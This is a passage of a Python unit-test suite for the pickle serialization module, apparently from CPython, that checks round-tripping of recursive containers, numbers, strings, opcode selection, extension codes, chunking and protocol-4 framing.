for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def test_recursive_list(self):
l = []
l.append(l)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_tuple_and_list(self):
t = ([],)
t[0].append(t)
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], list)
self.assertEqual(len(x[0]), 1)
self.assertIs(x[0][0], x)
def test_recursive_dict(self):
d = {}
d[1] = d
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_key(self):
d = {}
k = K(d)
d[k] = 1
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(len(x.keys()), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_set(self):
y = set()
k = K(y)
y.add(k)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
def test_recursive_list_subclass(self):
y = MyList()
y.append(y)
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, MyList)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_dict_subclass(self):
d = MyDict()
d[1] = d
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_subclass_key(self):
d = MyDict()
k = K(d)
d[k] = 1
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(len(list(x.keys())), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_inst(self):
i = C()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, C)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = C()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def check_recursive_collection_and_inst(self, factory):
h = H()
y = factory([h])
h.attr = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, type(y))
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], H)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self.check_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self.check_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self.check_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self.check_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self.check_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyFrozenSet)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
        # make sure that floats are formatted in a locale-independent way with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
    # Register a type with copyreg, with extension code extcode.  Pickle
    # an object of that type.  Check that the resulting pickle uses the
    # matching EXT opcode (EXT1, EXT2 or EXT4) under proto 2, and not
    # under proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
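    # For reference (per pickletools): EXT1 carries a 1-byte extension code,
    # EXT2 a 2-byte little-endian code, and EXT4 a 4-byte little-endian code,
    # which is why the code ranges chosen above map onto the three opcodes.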
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
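    # Rough summary of the three tests above: NEWOBJ (protocol 2+) rebuilds an
    # instance as cls.__new__(cls, *args) from __getnewargs__(), while
    # NEWOBJ_EX (protocol 4+) additionally carries keyword arguments from
    # __getnewargs_ex__(); __init__ is bypassed either way, which is what the
    # SimpleNewObj/ComplexNewObj helpers defined later in this file rely on.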
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
        # Test compactness of the int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
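    # These two constants are assumed to mirror the framing parameters of the
    # pickle module itself (a target frame size of about 64 KiB and a minimal
    # frame payload of 4 bytes); the checks below rely only on the values
    # defined here.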
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
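                # Frame overhead is 9 bytes: 1 for the FRAME opcode itself
                # plus an 8-byte little-endian length (see the matching
                # frame_opcode_size = 9 in remove_frames() further down).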
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
                    # A single frame is expected for the small objects between
                    # the first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
        # Large byte objects (dict values) interleaved with small objects
        # (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
            # but not too many either: there can be one write for the PROTO
            # opcode, one per frame header, one per frame for the actual
            # contents, and two more for the trailing large string's own
            # header and payload; hence the 2 * n_frames + 3 bound below.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
